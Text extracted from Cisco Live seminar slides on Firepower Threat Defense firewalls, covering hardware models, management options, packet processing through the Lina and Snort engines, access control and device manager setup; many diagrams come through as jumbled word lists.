Tecsec 2600
Tecsec 2600
TECSEC-2600
Cisco Webex Teams
Questions?
Use Cisco Webex Teams to chat
with the speaker after the session
How
1 Find this session in the Cisco Events Mobile App
2 Click “Join the Discussion”
3 Install Webex Teams or go directly to the team space
4 Enter messages/questions in the team space
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
Download Scripts
and Presentation
http://cs.co/TECSEC-2600
Please Install Kahoot
Agenda
• Introduction
• HW/SW Overview
• Day in a life of a packet
• FDM & CDO
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 6
Agenda
• Migration
• Backup & Restore
• REST API Overview
• API Use Cases
• Deployment and Interface Modes
• Application Visibility and Control (AVC)
• NextGen Intrusion Prevention System
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 7
Agenda
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 8
Agenda
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 9
Housekeeping
• Please note the handout-material has much more slides than presented
• Various slides are marked as Reference and will not be covered in detail
• Breaks for coffee and lunch
• 10.30am – 10.45am
• 12.45pm – 2.30pm
• 4.30pm – 4.45pm
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 10
Housekeeping
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 11
Housekeeping
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 12
Firepower Diagonal Learning Map Thursday BRKSEC-2034 -14h45
Cloud Management of Firepower and ASA with
Cisco Defense Orchestrator
BRKSEC-3093 - 14h45
BRKSEC-3328 – 11h00 ARM yourself using
Making Firepower Management NGFWv in AZURE
Center (FMC) Do More
Thursday BRKSEC-3300 – 9h00
Advanced IPS Deployment
BRKSEC 2348 – 17h00 with Firepower NGFW
Deploying AC with FP – posture & MFA
BRKSEC-2140 – 9h00
2 birds with 1 stone: DUO integration
BRKSEC 2020 – 11h00 Wednesday with Cisco ISE and Firewall solutions
Deploying FP Tips and Tricks BRKSEC-3455 – 11h15
Dissecting Firepower NGFW:
Architecture and Troubleshooting
Tuesday
BRKSEC 2494 – 8h30 BRKSEC-3032 – 11H30
Maximizing Threat Efficacy & Perf Firepower NGFW Clustering
BRKSEC-2663 -16h45 Deep Dive
BRKSEC 3063 - 14h30 DDoS Mitigation: Introducing Radware Deployment
Decrypting the Internet with Firepower!
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 13
Hardware |
Software Overview
Security Software Convergence
ASA FirePOWER
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 15
Firepower Threat Defense
Advanced
WWW Granular Cisco® Application
Clustering & Intrusion Malware
URL Filtering
Visibility and Control (AVC)
Prevention Protection
High Availability
Firepower
Analytics &
Automation
Industry-leading NGIPS (NGIPS)
Application
Network Firewall Visibility & Built-in Network Identity-Policy
Routing | Control Profiling Control & VPN
Switching Reputation- and category-based
URL filtering
Firepower Threat Defense
Advanced Malware Protection
(AMP)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 16
Hardware Platforms
NEW
FPR 9300 Series
SM-24 SM-40
SM-36 SM-48
FPR 4115/25/45
SM-44 SM-56
Performance
NEW
FPR 2110/20/30/40
FPR 4110/20/40/50
NEW
FPR 1120/40/50
ASA 5525/45/55 FTDv
FPR 1010
ASA 5506/08/16 NGIPSv
ISA 3000 ASAv
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 17
Firepower Threat Defense Virtual Platforms
FTDv
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 18
Firepower Management Options
Security Integrations Common APIs
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 19
Which manager is right for your network?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 21
For Your
EOL Updates and Last Supported Code Reference
FPR4115-45/FPR9300
FPR8K N/A N/A 6.4
(SM40/48/56)
FMC 1500, 3500 FMC 1600, 2600, 4600 N/A 6.4 6.4
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 22
Firepower
Management
Center
Firepower Management Center (FMC)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 24
For Your
FMC Scaling Reference
Event Rate
Event Storage
Events
Connection, IPS,
Number of sensors
File, Malware
FTD Model Type
Network load
Logging setup
NGFW
FTD FMC
Deployment Time
4500
NGFW
Bandwidth
FTD
Management
Data Download size
Channel
Configuration,
Number of sensors
Updates, Image
Model Type
ACL complexity
HA deployment
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 26
FMC Communication Elements
Data Transfer
Item Typical Package Size Default Timeout
Direction
Device
1-10MB depending on features
Configuration and FTD<-FMC 5 minutes
Up to 1MB added for SRU
SRU
20MB for low-end platforms
URL Database FTD<-FMC 60 minutes
40-450MB for high-end platforms
Asynchronous VDB 10 minutes under 10MB
FTD<-FMC 30-70MB every ~6 weeks
Updates 60 minutes under 4GB
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 27
FMC Link Bandwidth Requirements
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 28
For Your
FMC Configuration Bundle Size Reference
• Number of access policy rules applied on the managed device greatly influences the
size of configuration data to be downloaded
Number of rules = (source subnets or hosts)*(destination subnets or hosts)*(source
ports)*(destination ports)*(custom URLs)*(vlan tags)*(URL categories)*(valid source
and destination zone pairs)
• Recommendations:
• Use Security Intelligence Blacklists to block access to destination subnets instead of access
rule
• Use Application Filters instead of ports wherever possible in access rule
• Zones should contain interfaces
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 29
For Your
Event Management Best Practices Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 37
Firepower 9300
Firepower 9300 Overview
Supervisor Network Modules
• Application deployment and orchestration • 10GE, 40GE, and 100GE
• Network attachment and traffic distribution • Hardware bypass for inline NGIPS
• Clustering base layer for ASA/FTD
3RU
Security Modules
• Embedded Smart NIC and crypto hardware
• Cisco (ASA, FTD) and third-party (Radware DDoS) applications
• Standalone or clustered within and across chassis
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 39
Supervisor Module
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 40
Supervisor Simplified Hardware Diagram
System Bus
Security Security Security
RAM
Module 1 Module 2 Module 3
On-board NM NM
8x10GE Slot 1 Slot 2
interfaces
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 41
Standard Network Modules
Number of
Speed Type Supported Plaforms
Ports
1GE 8 SFP Firepower 2100
10GE 8 SFP+ Firepower 2100, 4100 and 9300
QSFP 40G
40GE 4 Firepower 4100 and 9300
QSFP 4x10G
2 (double)
100GE QSFP 100G Firepower 9300
2/4 (single)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 42
Hardware Bypass Fail-to-Wire Network Modules
Number of
Speed Type Supported Platforms
Ports
1GE 6 SX Firepower 2100 and 4100
1GE 8 GE Firepower 2100 and 4100
10GE 6 SR/LR Firepower 2100, 4100 and 9300
40-G BASE-
40GE 2 Firepower 4100 and 9300
SR4
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 43
Firepower 9300 Security Modules
• New modules
• SM-40: 80 x86 CPU cores
• SM-48: 96 x86 CPU cores
• SM-56: 112 x86 CPU cores
• Higher performance on cryptographic operations
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 44
Security Module Simplified Diagram
RAM
SM24:256 GB
SM36:256 GB System Bus
SM40: 384 GB x86 CPU 1 x86 CPU 2
SM44: 256 GB SM24: 12 cores SM24: 12 cores
SM48: 384 GB SM36: 18 cores SM36: 18 cores
SM56: 384 GB SM40: 20 cores SM40: 20 cores
SM44: 22 cores SM44: 22 cores Ethernet
SM48: 24 cores SM48: 24 cores
SM56: 28 cores SM56: 28 cores
2x100Gbps
2x40Gbps
Backplane Supervisor Connection
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 45
For Your
FTD CPU Core Allocation Reference
Firepower 4110 24 22 2 8 12
Firepower 4115 48 46 2 16 28
Firepower 4120 48 46 2 20 24
Firepower 4125 64 62 2 24 36
Firepower 4140 72 70 2 32 36
Firepower 4145 88 86 2 32 52
Firepower 4150 88 86 2 36 48
Firepower 9300 SM-24 48 46 2 20 24
Firepower 9300 SM-36 72 70 2 32 36
Firepower 9300 SM-40 80 78 2 32 44
Firepower 9300 SM-44 88 86 2 36 48
Firepower 9300 SM-48 96 94 2 40 52
Firepower 9300 SM-56 112 110 2 44 64
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 46
For Your
Monitoring System Utilization Reference
Data Path
Core 5 sec 1 min 5 min Control Plane
Core 0 2.0 (2.0 + 0.0) 1.1 (1.1 + 0.0) 0.9 (0.9 + 0.0)
(most transit Core 1 3.2 (3.2 + 0.0) 1.8 (1.8 + 0.0) 1.5 (1.5 + 0.0)
(network
traffic) […] control and
Core 35 0.0 (0.0 + 0.0) 0.0 (0.0 + 0.0) 0.0 (0.0 + 0.0)
application
• Advanced inspection)
ftd# show asp inspect-dp snort
Inspection SNORT Inspect Instance Status Info
Modules
Id Pid Cpu-Usage Conns Segs/Pkts Status
tot (usr | sys)
Inspection -- ----- ---------------- ---------- ---------- ----------
0 47430 1% ( 1%| 0%) 621 0 READY
Load 1 47434 0% ( 0%| 0%) 610 0 READY Processing
Load
[…] State
45 47474 2% ( 2%| 0%) 572 0 READY
Distribution
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 47
For Your
Performance Highlights Cisco Reference
Firepower 9300
3x 3x
Features SM-24 SM-36 SM-40 SM-44 SM-48 SM-56
SM-44 SM-56
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 48
Firepower 9300 Software
• All images are digitally signed and validated through Secure Boot
Supervisor
FTD Instance A FTD Instance B FTD Instance C FTD Instance D ASA Instance A
4 CPU 4 CPU 12 CPU 4 CPU 12 CPU
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 50
FP9300 Application Flexibility
ASA Native
FTD Native
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 51
BRKSEC-3032
Firewall Clustering Clustered
Firewall
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 52
FTD Inter-chassis vs Intra-chassis clustering
FTD Inter-Chassis Cluster (FTD 6.2+)
• Cluster of up to 6 modules (in 2 chassis)
• Off-chassis flow backup for complete redundancy
Switch 1 Switch 2
Nexus vPC
Supervisor Supervisor
FTD FTD FTD FTD
Cluster
FTD Cluster FTD
Logical
Supervisor Data Outside Data Inside Packet Flow
PortChannel2 PortChannel1
Ethernet1/7
(Management)
On-board
8x10GE 4x40GE NM 4x40GE NM Application
interfaces Slot 1 Slot 2 Image Storage
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 54
Firepower 4100
Firepower 4100 Overview
1RU
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 56
Firepower 4100 Architecture
RAM
4110: 64Gb
x86 CPU 1 x86 CPU 1
4115: 192Gb
4110: 12 cores 4110: NA
4120: 128Gb 4115: 12 cores 4115: 12 cores
4125: 192Gb 4120: 12 cores 4120: 12 cores System Bus
4140: 256Gb 4125: 16 cores 4125: 16 cores
4145: 384Gb 4140: 18 cores 4140: 18 cores
4150: 256Gb 4145: 22 cores
4150: 22 cores
4145: 22 cores
4150: 22 cores
RAM
4110: 1x100Gbps Ethernet
4115-4150: 2x100Gbps
Smart NIC and
Crypto Accelerator
4110: 1x40Gbps
4115-4150: 2x40Gbps
On-board 8x10GE NM NM
interfaces Slot 1 Slot 2
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 57
Firepower 4100 Software
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 58
For Your
Performance Highlights Cisco Reference
Firepower 4100
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 59
Firepower 2100
Firepower 2100 Overview
1RU
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 61
Firepower 2100 Architecture
x86 CPU
2110: 4 cores RAM
2120: 6 cores 2110-2120: 16GB
2130: 8 cores Data32GB
2130: Path: System Bus
2140: 64GB
2140: 16 cores • NAT
• VPN
Network Processor Unit (NPU) Ethernet
2110: 6 cores
Routing
• RAM
2120: 8 cores • Stateful
2110-2120: 8GB Firewall
2130: 12 cores • High16GB
2130-2140: Availability
2140: 16 cores • Prefilter Action:
2110-2120: 2x10Gbps
2x10Gbps
2130-2140: 1x40Gbps
• Block, Fastpath,
Analyze
Internal Switch Fabric
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 62
Firepower 2100 Architecture
x86 CPU Advanced Inspections
RAM
2110: 4 cores Modules:
2110-2120:
2120: 6 cores AVC with OpenAppID
• 16GB System Bus
2130: 8 cores • NGIPS
2130: 32GB
2140: 16 cores 2140: 64GB & File inspection (AMP)
• Malware
Network Processor Unit (NPU) • Security Intelligence
Ethernet
2110: 6 cores • RAM
URL Filter
2110-2120: 8GB
2120: 8 cores • User Identity
2130-2140:
2130: 12 cores
2140: 16 cores 16GB
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 63
For Your
Performance Highlights Cisco Firepower Reference
Model
Cisco Firepower Model 2100
Firewall Throughput
3 Gbps 6 Gbps 10 Gbps 20 Gbps
(ASA)
Throughput:
FW + AVC 2.0 Gbps 3 Gbps 4.75 Gbps 8.5 Gbps
(FTD)*
Throughput:
FW + AVC + NGIPS 2.0 Gbps 3 Gbps 4.75 Gbps 8.5 Gbps
(FTD)*
*HTTP sessions with an average packet size of 1024 bytes.
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 64
Firepower 1000
Firepower 1100 Overview
1RU
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 66
Firepower 1010 Overview
Integrated Security Appliance with ASA or FTD
• Embedded x86 CPU with QuickAssist Crypto Acceleration
• Fixed non-modular configuration
Desktop
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 67
Firepower 1000 Architecture
x86 CPU
1010: 8 cores RAM System Bus
1120: 24 cores 1010: 8GB
1140: 32 cores 1120-1140: 16GB
1150: 32 cores 1150: 32GB
Ethernet
1010: 2x2.5Gbps
1120-1150: 2x10Gbps
8x1Gbps 4x1Gbps
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 68
Firepower 1000/2100 ASA Appliance Mode
• Platform mode
• Configuration of basic operating parameters and hardware interface settings in FXOS
• Configuration of your security policy in the ASA operating system using ASDM or the ASA CLI
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 69
Industrial Security
Appliance (ISA)
3000
ISA 3000
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 71
A Day In a Life Of
a Packet
Packet Processing - Overview
• A packet enters the ingress interface and it is handled by the chassis internal switch.
• The packet enters the FTD Lina engine which does mainly L3/L4 checks.
• If the policy requires the packet is inspected by the Snort engine (mainly L7 inspection).
• The Snort engine returns a verdict (for example, whitelist or blacklist) for the packet.
• The LINA engine drops or forwards the packet based on Snort’s verdict.
• The packet egresses the chassis through the internal chassis switch.
Internal
Switch Advanced Inspection Engine
FXOS
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 73
For Your
FTD CLI Configuration Modes Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 74
NGFW Packet Flow
Datapath
TCP Intercept
L4 Decode
IP Decode,
Reassembly
L2 Decode
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
NGFW Packet Flow – Defragmentation Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 81
NGFW Packet Flow
Datapath
VPN Decrypt
TCP Intercept
L4 Decode
IP Decode,
Reassembly
L2 Decode
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
BRKSEC-3032
NGFW Packet Flow
Datapath
Update Flow
Flow
Database
Route and Flow
Lookup
Cluster Flow
Redirect
VPN Decrypt
Existing
TCP Intercept
L4 Decode
IP Decode,
Reassembly
L2 Decode
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
TCP Intercept
L4 Decode
IP Decode,
Reassembly
L2 Decode
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
TCP Intercept
L4 Decode
IP Decode,
Reassembly
L2 Decode
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow – Prefilter Policies
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 90
NGFW Packet Flow – Prefilter Policies
Phase: 16
Type: SNORT
…
Reputation: packet blacklisted, drop
…
Snort id 0, NAP id 2, IPS id 0, Verdict BLACKLIST, Blocked by SI/Reputation
Snort Verdict: (black-list) black list this flow
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 91
For Your
NGFW Packet Flow – Prefilter Policies Reference
(Tunnel)
• Adds additional flexibility when it comes to handling tunneled traffic
• GRE, IP-in-IP, IPv6-in-IP, Teredo Port 3544
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 92
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
TCP Intercept
L4 Decode
IP Decode,
Reassembly
L2 Decode
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
TCP Intercept
TCP Normalizer
L4 Decode
IP Decode,
TCP Proxy
Reassembly
L2 Decode
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
TCP Intercept
TCP Normalizer
L4 Decode
IP Decode,
TCP Proxy
Reassembly
Load-Balance to
L2 Decode
Snort
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
TCP Intercept
TCP Normalizer
L4 Decode
IP Decode,
TCP Proxy
Reassembly
Load-Balance to
L2 Decode L2-L3 Decode
Snort
Inspection Engines
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
TCP Intercept
TCP Normalizer
L4 Decode
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow – Reputation & SI
• Security Intelligence (SI) can Blacklist (drop) or Whitelist (allow) IP addresses early in
the packet processing lifetime within the Snort engine
• The Blacklist can be populated in 2 ways:
• Automatically by Intelligence Feed (Talos or custom) or List
• Manually by the FMC administrator
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 103
For Your
NGFW Packet Flow – Reputation & SI Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 104
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
TCP Intercept
TCP Normalizer
Main Access
L4 Decode Policy
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow – Main Access Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 107
NGFW Packet Flow – ACL, Allow Action
• Allow Rule will be pushed to datapath as permit action and to advanced inspection
engine as allow action
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 108
For Your
NGFW Packet Flow – ACL, Allow Action Reference
• The rule ID correlates datapath rules with the advanced inspection rules
firepower# show access-list
access-list CSM_FW_ACL_ line 8 remark rule-id 268435456: L7 RULE:
ACP_Rule1_Allow_ICMP_App
access-list CSM_FW_ACL_ line 9 advanced permit ip host 1.1.1.1 host 2.2.2.2 rule-
id 268435456
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 109
For Your
NGFW Packet Flow – ACL, Trust Action Reference
• Trust Rule will be pushed to datapath as permit action and to advanced inspection
engine as fastpath action
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 110
NGFW Packet Flow – ACL, Trust Action
Dynamic Flow Offload
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 112
Flow Offload Operation
Full Inspection
• Dynamically program Offload engine after flow establishment
Security Module
x86 CPU Complex
Full FTD or ASA Engine
Flow Offload
• Limited state tracking, NAT/PAT, TCP Seq Randomization
• 20-40Gbps per single TCP/UDP flow, 2.9us UDP latency, 4M tracked flows
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 113
For Your
Dynamic Flow Offload Reference
Phase: 5
Type: SNORT
…
Firewall: trust/fastpath rule, id 268461071, allow
Snort id 5, NAP id 1, IPS id 0, Verdict WHITELIST
Snort Verdict: (fast-forward) fast forward this flow © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
NGFW Packet Flow – Main Access Policy Reference
• Place more specific rules at the top of the Access Control Policy
• Place rules that require Snort inspection at the bottom of the policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 120
For Your
NGFW Packet Flow – Main Access Policy Reference
Logging
Default Syslog
configuration can be
overridden
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 121
For Your
NGFW Packet Flow – Main Access Policy Reference
Identity
• Identity Policy enables user-based authentication. The user info can be obtained in
various ways:
Active Authentication Passive Authentication
Captive Portal (Basic, NTLM, Kerberos) Integration with AD (FPUA)
Remote Access VPN Integration with ISE and ISE-PIC (pxGRID)
Integration in VDI (Terminal Server Agent)
Network Discovery (Traffic based Detection)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 123
For Your
NGFW Packet Flow – Main Access Policy Reference
TLS Inspection
• TLS Inspection Policy controls which traffic will be decrypted by FTD so that other
policies (ACP, File, …) can inspect the traffic Don´t do this. Don´t
use self-signed
certificates!!!
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
NGFW Packet Flow – Advanced Malware Reference
Prevention
• A File Policy is attached to Main Access Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 134
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Database
Route and Flow
Lookup
Cluster Flow Network File/AMP
NGIPS
Redirect Discovery Processing
VPN Decrypt
Existing
Network
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
L4 Decode Policy
Existing
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Application
Database Inspection
Route and Flow
Lookup
Cluster Flow Network File/AMP
NGIPS
Redirect Discovery Processing
VPN Decrypt
Existing
Network
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
L4 Decode Policy
Existing
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
NGFW Packet Flow Reference
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Application
Database Inspection
Route and Flow
Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
L4 Decode Policy
Existing
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Application
Database Inspection
Route and Flow
Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
QoS
L4 Decode Policy
Existing
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
NGFW Packet Flow Reference
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Application
Database Inspection
Route and Flow
Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
QoS
L4 Decode Policy
Existing
RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Application
Database Inspection
Route and Flow
Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
QoS
L4 Decode Policy
Existing
RX TX
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Firepower Device
Manager (FDM)
Firepower Device Manager (FDM)
Integrated on-box option for single/HA instance deployment
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 148
Cabling for FTD managed by FDM - Hardware
Connect the Interfaces
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 150
For Your
Cabling for Firepower 4100 Reference
• FTD Logical device Management interface; Any interface on the chassis for this purpose other
than the chassis management port, which is reserved for FXOS management
• Data interfaces - Connect the data interfaces to your logical device data networks. You can
configure physical interfaces, EtherChannels, and breakout ports to divide up high-capacity
interfaces
• For High Availability, use a Data interface for the failover/state link
All interfaces other than
the console port require
SFP/SFP+/QSFP
transceivers
Perform
initial FTD configuration
on the logical device
Management interface
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 156
For Your
Setting Up the System Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 160
For Your
Cabling for FTD managed by FDM - Virtual Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 161
For Your
Source to Destination Network Mapping Reference
Destination Network
Network Adapter Source Network (Physical Interface Name) Function
Network adapter 1 Management0-0 Management0/0 Management
Network adapter 2 Diagnostic0-0 Diagnostic0/0 Diagnostic
Network adapter 3 GigabitEthernet0-0 GigabitEthernet0/0 Outside data
Network adapter 4 GigabitEthernet0-1 GigabitEthernet0/1 Inside data
Network adapter 5 GigabitEthernet0-2 GigabitEthernet0/2 Data traffic
Network adapter 6 GigabitEthernet0-3 GigabitEthernet0/3 Data traffic
Network adapter 7 GigabitEthernet0-4 GigabitEthernet0/4 Data traffic
Network adapter 8 GigabitEthernet0-5 GigabitEthernet0/5 Data traffic
Network adapter 9 GigabitEthernet0-6 GigabitEthernet0/6 Data traffic
Network adapter 10 GigabitEthernet0-7 GigabitEthernet0/7 Data traffic
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 162
Demo:
Setting up FDM on a Firepower 4100
Series
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 165
For Your
Overview Security Policies Reference
• SSL Decryption
• NAT
• Decrypt Re-Sign / Known Key
• Static / Dynamic NAT
• Do Not Decrypt
• Dynamic Port Address Translation
• Block
• Identity NAT
• Identity Policy
• Access Control
• Passive Authentication
• Active Authentication • Intrusion Policies
• Balanced Security
• Security Intelligence
• Connectivity Over Security
• Source/Destination IP address
• Security Over Connectivity
• Destination URL
• Security Over Connectivity
• DNS
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 167
For Your
Access Control Rules Reference
• Source and destination IP addresses, protocol, ports and interfaces (in the form of
security zones)
• Fully-qualified domain name (FQDN) of the source or destination (in the form of a
network object)
• The application, or categories of applications, applications tagged with a particular
characteristic (client, server, web / risk or business relevance)
• Destination URL of a web request, generalized category, reputation of the target site
• User who is making the request or the user groups to which the user belongs
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 168
Access Control Rules
• Control which traffic is allowed to pass through and apply adv. services
• Access control policy to allow, trust
or block access to network
resources
• The policy consists of a set of
ordered rules, which are evaluated
from top to bottom
• The rule applied to traffic is the first
one where all the traffic criteria are
matched
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 169
Cisco Defense
Orchestrator (CDO)
Cisco Defense Orchestrator (CDO)
Cloud-based multi-device manager
